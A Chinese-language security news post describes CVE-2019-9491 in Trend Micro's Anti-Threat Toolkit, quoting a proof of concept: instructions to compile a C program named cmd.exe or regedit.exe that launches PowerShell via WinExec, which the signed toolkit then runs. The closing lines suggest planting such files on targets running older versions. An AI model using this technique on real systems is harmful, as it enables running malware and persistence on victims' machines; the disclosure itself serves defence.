趋势科技威胁工具包存在任意代码执行漏洞，漏洞成因略无语

研究人员发现趋势科技防威胁工具包（ATTK）存在任意代码执行漏洞CVE-2019-9491，攻击者可利用此漏洞在目标Windows系统上运行恶意软件。

由于ATTK是由经过验证的发行方签名的，因此可绕过任何MOTW安全警告，攻击者甚至可以将ATTK作为一种持久性机制。

[Exploit/POC]
Compile an .EXE using below "C" code and use naming convention of "cmd.exe" or "regedit.exe".
Run the Anti-Threat Toolkit and watch the ATTK console to see the Trojan file get loaded and executed.

将恶意软件命名为cmd.exe或regedit.exe，ATTK将会加载并运行该文件

#include

void main(void){
puts("Trend Micro Anti-Threat Toolkit PWNED!");
puts("Discovery: hyp3rlinx");
puts("CVE-2019-9491\n");
WinExec("powershell", 0);
}

演示视频

POC下载

http://hyp3rlinx.altervista.org/advisories/TREND-MICRO-ANTI-THREAT-TOOLKIT-(ATTK)-REMOTE-CODE-EXECUTION.txt

而旧版本应该还可用，以及将cmd.exe或regedit.exe为命名的恶意软件投放到目标设备，也许都收获一份惊喜。(前提是知道目标有装)

顺便推荐一下这哥们的博客，全是他发现的0day漏洞，学习学习。